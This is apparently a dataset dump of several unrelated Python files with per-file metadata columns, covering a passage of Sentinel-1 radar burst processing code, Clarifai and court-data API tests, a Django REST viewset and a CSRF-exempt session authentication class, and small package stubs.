    if not os.path.exists(dim(importMst)):
        slc2Ard.slcBurstImport(mstFile, importMst, logFile, swath, burstMst)

    # H/A/alpha decomposition, geocode, export, clean up
    outH = opj(tmpDir, '{}_h'.format(fileIdMst))
    slc2Ard.slcHalpha(dim(importMst), outH, logFile)
    outHTc = opj(tmpDir, '{}_HAalpha'.format(fileIdMst))
    slc2Ard.slcTC(dim(outH), outHTc, logFile, outResolution)
    export(outHTc, 'HAalpha')
    h.delDimap(outH)

    # calibrate backscatter; terrain-flatten first when RTC was requested
    outCal = opj(tmpDir, '{}_cal'.format(fileIdMst))
    slc2Ard.slcBackscatter(dim(importMst), outCal, logFile, prdType)
    if prdType == 'RTC':
        outRtc = opj(tmpDir, '{}_rtc'.format(fileIdMst))
        slc2Ard.slcTerrainFlattening(dim(outCal), outRtc, logFile)
        h.delDimap(outCal)
        # downstream steps read the flattened product
        outCal = outRtc

    # geocode backscatter and export
    outTc = opj(tmpDir, '{}_BS'.format(fileIdMst))
    slc2Ard.slcTC(dim(outCal), outTc, logFile, outResolution)
    export(outTc, 'BS')

    # layover/shadow mask and export
    outLs = opj(tmpDir, '{}_LS'.format(fileIdMst))
    slc2Ard.slcLSMap(dim(outCal), outLs, logFile, outResolution)
    export(outLs, 'LS')
    h.delDimap(outCal)

    # import the slave burst and co-register it with the master
    importSlv = opj(tmpDir, '{}_import'.format(fileIdSlv))
    slc2Ard.slcBurstImport(slvFile, importSlv, logFile, swath, burstSlv)
    fileList = '\'{}\''.format(','.join([dim(importMst), dim(importSlv)]))
    outCoreg = opj(tmpDir, '{}_coreg'.format(fileIdMst))
    slc2Ard.slcCoreg(fileList, outCoreg, logFile)
    h.delDimap(importMst)
    if removeSlvImport is True:
        h.delDimap(importSlv)

    # coherence estimation, geocode, export, clean up
    outCoh = opj(tmpDir, '{}_c'.format(fileIdMst))
    slc2Ard.slcCoherence(dim(outCoreg), outCoh, logFile)
    h.delDimap(outCoreg)
    outTc = opj(tmpDir, '{}_coh'.format(fileIdMst))
    slc2Ard.slcTC(dim(outCoh), outTc, logFile, outResolution)
    export(outTc, 'coh')
    h.delDimap(outCoh)
def slcBurst2PolArd(mstFile, logFile,
                    swath, burstMst,
                    outDir, fileIdMst,
                    tmpDir, prdType='GTCgamma', outResolution=20):
    """Process one S1 SLC burst to ARD: H/A/alpha, backscatter and LS map,
    geocoded and moved into outDir (no coherence — single-scene variant).

    Intermediate products live in tmpDir and are removed as soon as they are
    no longer needed.
    """

    def dim(basename):
        # BEAM-DIMAP header path for a product basename
        return '{}.dim'.format(basename)

    def export(tmpBase, suffix):
        # move the .data dir / .dim header pair from tmpDir into outDir
        shutil.move('{}.data'.format(tmpBase),
                    opj(outDir, '{}_{}.data'.format(fileIdMst, suffix)))
        shutil.move(dim(tmpBase),
                    opj(outDir, '{}_{}.dim'.format(fileIdMst, suffix)))

    # import the master burst (re-use an import left over from a prior run)
    importMst = opj(tmpDir, '{}_import'.format(fileIdMst))
    if not os.path.exists(dim(importMst)):
        slc2Ard.slcBurstImport(mstFile, importMst, logFile, swath, burstMst)

    # H/A/alpha decomposition, geocode, export, clean up
    outH = opj(tmpDir, '{}_h'.format(fileIdMst))
    slc2Ard.slcHalpha(dim(importMst), outH, logFile)
    outHTc = opj(tmpDir, '{}_HAalpha'.format(fileIdMst))
    slc2Ard.slcTC(dim(outH), outHTc, logFile, outResolution)
    export(outHTc, 'HAalpha')
    h.delDimap(outH)

    # calibrate backscatter, then drop the import (nothing else reads it)
    outCal = opj(tmpDir, '{}_cal'.format(fileIdMst))
    slc2Ard.slcBackscatter(dim(importMst), outCal, logFile, prdType)
    h.delDimap(importMst)

    # terrain-flatten first when RTC was requested
    if prdType == 'RTC':
        outRtc = opj(tmpDir, '{}_rtc'.format(fileIdMst))
        slc2Ard.slcTerrainFlattening(dim(outCal), outRtc, logFile)
        h.delDimap(outCal)
        # downstream steps read the flattened product
        outCal = outRtc

    # geocode backscatter and export
    outTc = opj(tmpDir, '{}_BS'.format(fileIdMst))
    slc2Ard.slcTC(dim(outCal), outTc, logFile, outResolution)
    export(outTc, 'BS')

    # layover/shadow mask and export
    outLs = opj(tmpDir, '{}_LS'.format(fileIdMst))
    slc2Ard.slcLSMap(dim(outCal), outLs, logFile, outResolution)
    export(outLs, 'LS')
    h.delDimap(outCal)
| 36.255952
| 91
| 0.625513
| 670
| 6,091
| 5.638806
| 0.170149
| 0.076231
| 0.075701
| 0.037057
| 0.771043
| 0.744309
| 0.73478
| 0.725781
| 0.725781
| 0.725781
| 0
| 0.00569
| 0.220982
| 6,091
| 168
| 92
| 36.255952
| 0.790516
| 0.145296
| 0
| 0.642857
| 0
| 0
| 0.095837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.27381
| 0
| 0.297619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e054ee4d095976d449c9b29876c1f52d07a2cca8
| 3,309
|
py
|
Python
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 322
|
2015-08-25T03:16:11.000Z
|
2021-11-08T09:36:50.000Z
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 76
|
2015-10-25T13:03:47.000Z
|
2022-02-19T09:36:10.000Z
|
tests/rest_tests/test_public_models.py
|
Kylmakalle/clarifai-python
|
446ee3e410c409bc80c84d00d2b1a82465b65d95
|
[
"Apache-2.0"
] | 136
|
2015-09-04T13:48:27.000Z
|
2021-06-12T16:48:36.000Z
|
# -*- coding: utf-8 -*-
import logging
import unittest
from clarifai.rest import ClarifaiApp
from . import sample_inputs
class TestPublicModels(unittest.TestCase):
    """Smoke tests for the Clarifai public models.

    Each test runs a URL-based predict against one public model with the same
    sample image and asserts the API-level success code (10000). The repeated
    predict/assert body is factored into _assert_predict_ok so each test is a
    single line and new models are trivial to cover.
    """

    @classmethod
    def setUpClass(cls):
        # One shared app/client for the whole class; WARN keeps test logs quiet.
        cls.app = ClarifaiApp(log_level=logging.WARN)

    def _assert_predict_ok(self, model):
        """Predict on *model* with the sample URL and assert success (10000)."""
        res = model.predict_by_url(url=sample_inputs.METRO_IMAGE_URL)
        self.assertEqual(10000, res['status']['code'])

    def test_predict_with_apparel_model(self):
        self._assert_predict_ok(self.app.public_models.apparel_model)

    def test_predict_with_color_mode(self):
        self._assert_predict_ok(self.app.public_models.color_model)

    def test_predict_with_face_detection_model(self):
        self._assert_predict_ok(self.app.public_models.face_detection_model)

    def test_predict_with_face_embedding_model(self):
        self._assert_predict_ok(self.app.public_models.face_embedding_model)

    def test_predict_with_food_model(self):
        self._assert_predict_ok(self.app.public_models.food_model)

    def test_predict_with_general_embedding_model(self):
        self._assert_predict_ok(self.app.public_models.general_embedding_model)

    def test_predict_with_general_model(self):
        self._assert_predict_ok(self.app.public_models.general_model)

    def test_predict_with_landscape_quality_model(self):
        self._assert_predict_ok(self.app.public_models.landscape_quality_model)

    def test_predict_with_logo_model(self):
        self._assert_predict_ok(self.app.public_models.logo_model)

    def test_predict_with_moderation_model(self):
        self._assert_predict_ok(self.app.public_models.moderation_model)

    def test_predict_with_nsfw_model(self):
        self._assert_predict_ok(self.app.public_models.nsfw_model)

    def test_predict_with_portrait_model(self):
        self._assert_predict_ok(self.app.public_models.portrait_quality_model)

    def test_predict_with_textures_and_patterns_model(self):
        self._assert_predict_ok(self.app.public_models.textures_and_patterns_model)

    def test_predict_with_travel_model(self):
        self._assert_predict_ok(self.app.public_models.travel_model)

    def test_predict_with_wedding_model(self):
        self._assert_predict_ok(self.app.public_models.wedding_model)
| 40.353659
| 99
| 0.77395
| 479
| 3,309
| 4.970772
| 0.121086
| 0.080638
| 0.088198
| 0.113398
| 0.829903
| 0.829903
| 0.818984
| 0.688786
| 0.619908
| 0.619908
| 0
| 0.025798
| 0.109701
| 3,309
| 81
| 100
| 40.851852
| 0.782417
| 0.006346
| 0
| 0.355932
| 0
| 0
| 0.045648
| 0
| 0
| 0
| 0
| 0
| 0.254237
| 1
| 0.271186
| false
| 0
| 0.067797
| 0
| 0.355932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e05d9ad51f002ba61b7a8a84f368bbb34514ea09
| 229
|
py
|
Python
|
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
tests/agent/test_base_agent.py
|
icyblade/dream
|
818e77f1c25e51f8cd966f7aa4eb1bcd4207b208
|
[
"MIT"
] | null | null | null |
def test_base_agent():
    """BaseAgent starts detached from a game and every hook is a no-op."""
    from dream.agent import BaseAgent

    base = BaseAgent()
    assert base.in_game is None
    # run/observe/act are all stubs that return nothing
    for result in (base.run(), base.observe(), base.act('SOME_ACTION')):
        assert result is None
| 25.444444
| 43
| 0.69869
| 34
| 229
| 4.588235
| 0.529412
| 0.282051
| 0.230769
| 0.326923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218341
| 229
| 8
| 44
| 28.625
| 0.871508
| 0
| 0
| 0
| 0
| 0
| 0.048035
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 1
| 0.142857
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
e0742c7e4e9570642476a8034dfc2b12dc6c1b9c
| 102
|
py
|
Python
|
parser/team04/Interpreter/Expression/expression.py
|
mr8ug/tytus
|
a09abe4095e49d333a8ed9ca81cb3d88f90872ba
|
[
"MIT"
] | 1
|
2021-01-09T05:32:35.000Z
|
2021-01-09T05:32:35.000Z
|
parser/team04/Interpreter/Expression/expression.py
|
XiomRB/tytus
|
0873e4bdce5c110bee6ef2aa98240be6a93ae024
|
[
"MIT"
] | null | null | null |
parser/team04/Interpreter/Expression/expression.py
|
XiomRB/tytus
|
0873e4bdce5c110bee6ef2aa98240be6a93ae024
|
[
"MIT"
] | null | null | null |
from Interpreter.node import Node
class Expression(Node):
def getValue(self, env):
pass
| 14.571429
| 33
| 0.686275
| 13
| 102
| 5.384615
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 102
| 6
| 34
| 17
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
0eb3b80d7392ee334641a0123f62b5d8a424f121
| 171
|
py
|
Python
|
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | 3
|
2018-11-30T01:15:19.000Z
|
2021-10-31T19:08:04.000Z
|
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | null | null | null |
backend/foodpantry/rest_framework_csrf.py
|
karthikdamuluri/FoodPantry-App
|
b2d079ef05c9a7d3b9327db9549acd7f5d6ff393
|
[
"MIT"
] | null | null | null |
from rest_framework.authentication import SessionAuthentication
class CsrfExemptSessionAuthentication (SessionAuthentication):
def enforce_csrf(self, request):
return
| 28.5
| 63
| 0.865497
| 15
| 171
| 9.733333
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087719
| 171
| 5
| 64
| 34.2
| 0.935897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
0ec145b06f3645322fbaea01f63bb218a69b6523
| 75
|
py
|
Python
|
xray_ot/__init__.py
|
bdowning/xray-python-opentracing
|
25fc8fc306b6c899ef3f402bc48e310a4ee56cad
|
[
"MIT"
] | 43
|
2016-05-23T11:14:36.000Z
|
2021-10-21T05:43:59.000Z
|
xray_ot/__init__.py
|
bdowning/xray-python-opentracing
|
25fc8fc306b6c899ef3f402bc48e310a4ee56cad
|
[
"MIT"
] | 57
|
2016-04-13T23:04:24.000Z
|
2021-05-13T20:47:42.000Z
|
xray_ot/__init__.py
|
NyanKiyoshi/opentracing-python-xray
|
6d5963c00162b1e849087f82f50e2d1c0ddbe073
|
[
"MIT"
] | 21
|
2016-06-22T21:46:01.000Z
|
2020-08-12T23:16:49.000Z
|
from __future__ import absolute_import
from .tracer import Tracer # noqa
| 18.75
| 38
| 0.813333
| 10
| 75
| 5.6
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 75
| 3
| 39
| 25
| 0.888889
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
161eb693c2c81a38574c6dcf322bc6d1c2baee96
| 4,567
|
py
|
Python
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | 1
|
2022-01-27T14:28:40.000Z
|
2022-01-27T14:28:40.000Z
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | 16
|
2022-01-28T11:01:27.000Z
|
2022-03-30T14:01:11.000Z
|
test/routers/hearing_events_test.py
|
ministryofjustice/laa-court-data-api
|
2e79faac7469f0b31ecca0539906d281db08f86c
|
[
"MIT"
] | null | null | null |
from unittest.mock import Mock, patch, PropertyMock
from fastapi.testclient import TestClient
from laa_court_data_api_app.internal.oauth_client import OauthClient
from laa_court_data_api_app.main import app
from laa_court_data_api_app.models.hearing_events.hearing_events_response import HearingEventsResponse
from ..routers.fixtures import *
client = TestClient(app)
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_ok(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=pass")
assert response.status_code == 200
assert mock_cda_client["pass_hearing_events_route"].called
model = HearingEventsResponse(**response.json())
assert model.hearing_id is None
assert model.has_active_hearing is True
assert len(model.events) == 0
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_bad_request(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=fail")
assert response.status_code == 400
assert mock_cda_client["fail_hearing_events_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_not_found(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=notfound")
assert response.status_code == 404
assert mock_cda_client["notfound_hearing_events_uuid_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_server_error(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_settings.return_value = override_get_cda_settings
mock_cda_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=exception")
assert response.status_code == 424
assert mock_cda_client["exception_hearing_events_uuid_route"].called
assert response.content == b''
@patch('laa_court_data_api_app.internal.oauth_client.OauthClient.settings', new_callable=PropertyMock)
@patch('laa_court_data_api_app.internal.court_data_adaptor_client.CourtDataAdaptorClient.settings',
new_callable=PropertyMock)
def test_hearing_events_returns_none(mock_settings, mock_cda_settings, override_get_cda_settings,
mock_cda_client):
OauthClient().token = None
mock_cda_settings.return_value = CdaSettings(cda_endpoint="https://failed-test-url/", cda_secret="12345",
cda_uid="12345")
mock_settings.return_value = override_get_cda_settings
response = client.get("/v2/hearing_events/22d2222c-22ff-22ec-b222-2222ac222222?date=pass")
assert response.status_code == 424
assert response.content == b''
assert mock_cda_client["failed_token_endpoint"].called
| 50.186813
| 109
| 0.77644
| 579
| 4,567
| 5.704663
| 0.150259
| 0.079927
| 0.063579
| 0.093249
| 0.785347
| 0.778686
| 0.751438
| 0.751438
| 0.739025
| 0.739025
| 0
| 0.037321
| 0.14342
| 4,567
| 90
| 110
| 50.744444
| 0.807004
| 0
| 0
| 0.591549
| 0
| 0
| 0.279834
| 0.272389
| 0
| 0
| 0
| 0
| 0.239437
| 1
| 0.070423
| false
| 0.042254
| 0.084507
| 0
| 0.15493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
162060a26b7a35d8af4f9054874bb9de858a5091
| 298
|
py
|
Python
|
tests_storage/viewsets.py
|
Faunris/apiqa-storage
|
2ee0b204037b3ed6278867f90abd15ae16942d81
|
[
"MIT"
] | 1
|
2021-08-02T10:19:00.000Z
|
2021-08-02T10:19:00.000Z
|
tests_storage/viewsets.py
|
Ivan-Feofanov/apiqa-storage
|
9a0a4353dac3f48adf3025b428d39ab612a9fef9
|
[
"MIT"
] | 2
|
2019-06-13T07:17:56.000Z
|
2020-08-05T12:56:55.000Z
|
tests_storage/viewsets.py
|
Ivan-Feofanov/apiqa-storage
|
9a0a4353dac3f48adf3025b428d39ab612a9fef9
|
[
"MIT"
] | 6
|
2019-12-05T14:58:44.000Z
|
2021-03-07T08:51:14.000Z
|
from rest_framework import viewsets
from .models import ModelWithAttachments
from .serializers import ModelWithAttachmentsSerializer
class ModelWithAttachmentsViewSet(viewsets.ModelViewSet):
serializer_class = ModelWithAttachmentsSerializer
queryset = ModelWithAttachments.objects.all()
| 29.8
| 57
| 0.855705
| 24
| 298
| 10.541667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104027
| 298
| 9
| 58
| 33.111111
| 0.947566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
162dcf10d85673fafd5a2041a5e7229dfad031e7
| 127
|
py
|
Python
|
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | null | null | null |
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | null | null | null |
medspacy_io/vectorizer/__init__.py
|
medspacy/read_write
|
455605eecd40a491af79ad7ad4f010d2d71c53b2
|
[
"MIT"
] | 1
|
2020-08-14T11:52:10.000Z
|
2020-08-14T11:52:10.000Z
|
# This package includes classes that convert SpaCy doc spans to np.array or pandas DataFrame
from .Vectorizer import Vectorizer
| 63.5
| 92
| 0.834646
| 19
| 127
| 5.578947
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141732
| 127
| 2
| 93
| 63.5
| 0.972477
| 0.708661
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
1631093370317ae8cf01fc9a1139dbab5d12ba4d
| 40
|
py
|
Python
|
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | 5
|
2021-02-16T00:01:24.000Z
|
2021-03-08T19:18:49.000Z
|
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | null | null | null |
easy_logging/__init__.py
|
zircatron/setup-logging
|
b668994d93b67c0359216eed73d70f6a402a9f51
|
[
"MIT"
] | null | null | null |
from .easy_logging import setup_logging
| 20
| 39
| 0.875
| 6
| 40
| 5.5
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
163271691be1c4ae1aae1b90023915bf5cf08972
| 130
|
py
|
Python
|
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | 1
|
2020-06-21T13:45:26.000Z
|
2020-06-21T13:45:26.000Z
|
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | null | null | null |
FaceSwap-master/PRNet-master/utils/render.py
|
CSID-DGU/-2020-1-OSSP1-ninetynine-2
|
b1824254882eeea0ee44e4e60896b72c51ef1d2c
|
[
"MIT"
] | 3
|
2020-09-02T03:18:45.000Z
|
2021-01-27T08:24:05.000Z
|
version https://git-lfs.github.com/spec/v1
oid sha256:47bf5dc8df375bbeab9d7b1a4d0a3de9022248aae5b331cb7ef10b293b0e0041
size 12998
| 32.5
| 75
| 0.884615
| 13
| 130
| 8.846154
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.354839
| 0.046154
| 130
| 3
| 76
| 43.333333
| 0.572581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
164c03c0255bb2b108870ffd1d426f384e644efc
| 52
|
py
|
Python
|
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | 2
|
2020-09-02T19:40:02.000Z
|
2020-09-02T22:26:05.000Z
|
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | null | null | null |
Builders/__init__.py
|
Morgiver/cryder
|
67f9b0a85796637f6c89107f33b172367d8e9aa0
|
[
"MIT"
] | null | null | null |
from Builders.WindowsBuilder import WindowsBuilder
| 17.333333
| 50
| 0.884615
| 5
| 52
| 9.2
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096154
| 52
| 2
| 51
| 26
| 0.978723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
167b0811eeb8c383ee980c190ea1367399717b77
| 41
|
py
|
Python
|
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | null | null | null |
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | null | null | null |
python3.6/cal.py
|
gjbr5/python-link-e-learning
|
ed18f9537af29d7edd75686c9203d31b0a46ae5e
|
[
"MIT"
] | 6
|
2020-09-04T10:16:59.000Z
|
2020-12-03T01:47:03.000Z
|
import calendar
calendar.prmonth(2020, 9)
| 20.5
| 25
| 0.829268
| 6
| 41
| 5.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 0.073171
| 41
| 2
| 25
| 20.5
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
16803d089621ca33c03a0e10b9893062cbf4dc07
| 29
|
py
|
Python
|
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
pittgrub/storage/__init__.py
|
admtlab/PittGrubServer
|
25f6c0f119576338a33cd9b42aa39e6fb4802fec
|
[
"MIT"
] | null | null | null |
from .image import ImageStore
| 29
| 29
| 0.862069
| 4
| 29
| 6.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 29
| 1
| 29
| 29
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
